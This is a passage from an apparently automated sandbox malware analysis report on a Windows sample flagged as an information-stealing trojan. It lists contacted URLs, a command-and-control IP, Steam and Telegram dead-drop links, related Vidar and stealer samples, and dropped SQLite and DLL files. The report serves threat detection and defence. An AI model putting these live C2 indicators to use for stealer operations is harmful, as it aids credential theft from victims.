https://store.steampowered.com/about/	76561199658817715[1].htm.4.dr	false		high
https://steamcommunity.com/my/wishlist/	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://help.steampowered.com/en/	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://steamcommunity.com/market/	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://store.steampowered.com/news/	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	GCAFCAFH.4.dr	false		high
http://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://78.46.229.36/f	RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://steamcommunity.com/discussions/	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://78.46.229.36DBKJJ	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://steamcommunity.com/profiles/76561199658817715/inventory/	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://store.steampowered.com/stats/	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://steamcommunity.com/profiles/76561199658817715https://t.me/sa9okRed	file.exe, 00000001.00000002.2121549788.0000000004315000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://78.46.229.36/6	RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199658817715t	RegAsm.exe, 00000004.00000002.2403578458.0000000001401000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp	RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://store.steampowered.com/steam_refunds/	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://78.46.229.36/te5	RegAsm.exe, 00000004.00000002.2403578458.00000000013BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	GCAFCAFH.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://78.46.229.36/0	RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://78.46.229.36/D	RegAsm.exe, 00000004.00000002.2403578458.0000000001401000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://78.46.229.36/F	RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/workshop/	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://store.steampowered.com/legal/	RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
http://www.sqlite.org/copyright.html.	RegAsm.exe, 00000004.00000002.2409373476.0000000019D5D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2405143294.0000000013DB1000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=	76561199658817715[1].htm.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	GCAFCAFH.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199658817715	76561199658817715[1].htm.4.dr	false		high
https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
http://upx.sf.net	Amcache.hve.8.dr	false		high
https://78.46.229.36/$	RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/	76561199658817715[1].htm.4.dr	false		high
https://78.46.229.36/freebl3.dll6	RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=n5zImpoIZ8N	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://ac.ecosia.org/autocomplete?q=	GCAFCAFH.4.dr	false		high
https://78.46.229.36/Z0t	RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://78.46.229.36HJEBK	RegAsm.exe, 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high
https://t.me/sa9ok	file.exe, 00000001.00000002.2121549788.0000000004315000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHl	RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
78.46.229.36	unknown	Germany		24940	HETZNER-ASDE	false
104.105.90.131	steamcommunity.com	United States		16625	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1417273
Start date and time:	2024-03-28 20:34:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/31@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 84 Number of non-executed functions: 235
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
20:34:56	API Interceptor	1x Sleep call for process: WerFault.exe modified
20:34:56	API Interceptor	1x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
78.46.229.36	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	i1crvbOZAP.exe	Get hash	malicious	Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse
	yU3icg18lq.exe	Get hash	malicious	Vidar	Browse
	EcNghZJd5O.exe	Get hash	malicious	Vidar	Browse
	Rechnung.pdf.lnk	Get hash	malicious	Vidar	Browse
	Esp.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
104.105.90.131	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse
	Rechnung.pdf.lnk	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	SecuriteInfo.com.Win32.Evo-gen.1231.21474.exe	Get hash	malicious	Vidar, Xmrig	Browse
	doTtQFWKly.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	104.71.182.190
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	104.105.90.131
	file.exe	Get hash	malicious	Vidar	Browse	104.102.129.112
	i1crvbOZAP.exe	Get hash	malicious	Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	23.47.27.74
	yU3icg18lq.exe	Get hash	malicious	Vidar	Browse	23.47.27.74
	EcNghZJd5O.exe	Get hash	malicious	Vidar	Browse	104.102.129.112
	Rechnung.pdf.lnk	Get hash	malicious	Vidar	Browse	104.105.90.131
	Esp.exe	Get hash	malicious	Vidar	Browse	104.102.129.112
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	104.105.90.131
	file.exe	Get hash	malicious	Vidar	Browse	104.71.182.190

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	https://ckydb04.na1.hubspotlinks.com/Ctc/OP+113/cKydB04/VW9bQw4skpv3N4QMDhk6pMpJW5g6HvJ5ccjQdN61zzVd3qn9gW7lCdLW6lZ3m-VBhZqP2fNwFyN40GRrrMQlZ-N2TdQmJ13Y6QW10XVPX3kbMHcN4L237-7KHZ5W1zLF7f8GbdtBW2ZKqmb4N84ZcW3QDpzS6S7KJJW5X7x_l7b4v9TW2F362D3Hh1s9W54lklM4T0vLxN7h7S8FNlcHjW20Y8Mn2bFBzVW9hqyrD48FY07W1SGLwZ5DF_9-W40HntB7qL0THW1mF8BY3vVj3gW2n5NX74XPrGTW45qZ3V6l-BrTN7CsbcvdfdyCW5951f94y1-HGN8ZFSwmVlSf3W5fSXSN3-n9KQW8hNdv46-Q6rkf7QDZST04	Get hash	malicious	Unknown	Browse	104.105.46.200
	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	104.71.182.190
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	104.105.90.131
	p8F35SRiO8.elf	Get hash	malicious	Mirai	Browse	23.192.2.176
	Kie7OQsnAC.elf	Get hash	malicious	Mirai	Browse	23.74.215.167
	file.exe	Get hash	malicious	Vidar	Browse	104.102.129.112
	securedoc_20240328T081124.html	Get hash	malicious	Unknown	Browse	23.215.0.47
	https://airispharma1-my.sharepoint.com/:o:/g/personal/anagaraj_airispharma_com/EvmEpKGsyxtGnlrgsjVRxi4BOj2g3uhzHgNY6tXqx6wp5g?e=JtdJfI	Get hash	malicious	HTMLPhisher	Browse	23.215.0.235
	Quarantined Messages (12).zip	Get hash	malicious	Unknown	Browse	23.54.46.90
	https://mmsinconline-my.sharepoint.com/:b:/p/mamundson/EZ0kVsuFb_RJlwEzXHeEJ1gBaR0hj3PwWMy3ECS1r80Lcg?e=96yHrO	Get hash	malicious	Unknown	Browse	184.50.215.61
HETZNER-ASDE	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	78.46.229.36
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	78.46.229.36
	file.exe	Get hash	malicious	Vidar	Browse	78.46.229.36
	JAJL2EYBPH.exe	Get hash	malicious	DCRat	Browse	138.201.79.103
	https://mnrdtfqrcyfqiou.s3.amazonaws.com/mnrdtfqrcyfqiou.html#4HHHnO7279bGJq492fumheqtoju1686NCUIKVMPNMDQVMT689230/736882Y21#qgow23ahs76jjbq8j26ouc8n3ucpjfst25g85oeaei03mafty5n389r	Get hash	malicious	HTMLPhisher	Browse	49.12.134.254
	cvdLNZXNPZ.elf	Get hash	malicious	Mirai	Browse	188.42.90.189
	VJy4TgKlVo.elf	Get hash	malicious	Mirai	Browse	94.130.143.171
	https://colourlyrics.com/fe/KtHc5ruvtRkZFoArrtthaJsvCmg3Rb7X4JToP666Ry87hz3e3rFuRJGAPKBcoBZjAZJZK4pouqXoieozb8x97ijrpxmdxNfsxaBCR2nGFdZnrhtCVLagarbeJ5bjm2rcgeCmZPnkCo2NqoSFB3o6MQ	Get hash	malicious	Unknown	Browse	195.201.167.244
	i1crvbOZAP.exe	Get hash	malicious	Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	78.46.229.36
	yU3icg18lq.exe	Get hash	malicious	Vidar	Browse	78.46.229.36

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	78.46.229.36
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	78.46.229.36
	file.exe	Get hash	malicious	Vidar	Browse	78.46.229.36
	i1crvbOZAP.exe	Get hash	malicious	Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	78.46.229.36
	yU3icg18lq.exe	Get hash	malicious	Vidar	Browse	78.46.229.36
	EcNghZJd5O.exe	Get hash	malicious	Vidar	Browse	78.46.229.36
	Rechnung.pdf.lnk	Get hash	malicious	Vidar	Browse	78.46.229.36
	Esp.exe	Get hash	malicious	Vidar	Browse	78.46.229.36
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	78.46.229.36
	file.exe	Get hash	malicious	Vidar	Browse	78.46.229.36
37f463bf4616ecd445d4a1937da06e19	dVX6r5CyYY.exe	Get hash	malicious	GuLoader	Browse	104.105.90.131
	assento 555 pro-Model-2.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.105.90.131
	awb_shipping_doc_23642.vbs	Get hash	malicious	FormBook, GuLoader	Browse	104.105.90.131
	TOMBIG - 9004898 - Ponuka#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	104.105.90.131
	ocrev ns.ordine 290520280324.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.105.90.131
	lista de cotizaciones del catalogo#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	104.105.90.131
	CANKO DMC IMPORT ENQUIRY.PDF.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.105.90.131
	Transaction Advice_280324-WS-394-1247.vbe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.105.90.131
	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	104.105.90.131
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	104.105.90.131

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	z5uPcOrP22.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	i1crvbOZAP.exe	Get hash	malicious	Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse
	yU3icg18lq.exe	Get hash	malicious	Vidar	Browse
	EcNghZJd5O.exe	Get hash	malicious	Vidar	Browse
	PIa51EkBL7.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	G2KdVscPB4.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	ofrAxT2J4j.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	z5uPcOrP22.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	i1crvbOZAP.exe	Get hash	malicious	Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse
	yU3icg18lq.exe	Get hash	malicious	Vidar	Browse
	EcNghZJd5O.exe	Get hash	malicious	Vidar	Browse
	PIa51EkBL7.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	G2KdVscPB4.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	ofrAxT2J4j.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AECAKJJECAEGCBGDHDHCFCFHJD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFCFHDHIIIECBGCAKFIJDHJEGI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAEBGHCFCAAFIECAFIIIDBAFII

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGDHIEGC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

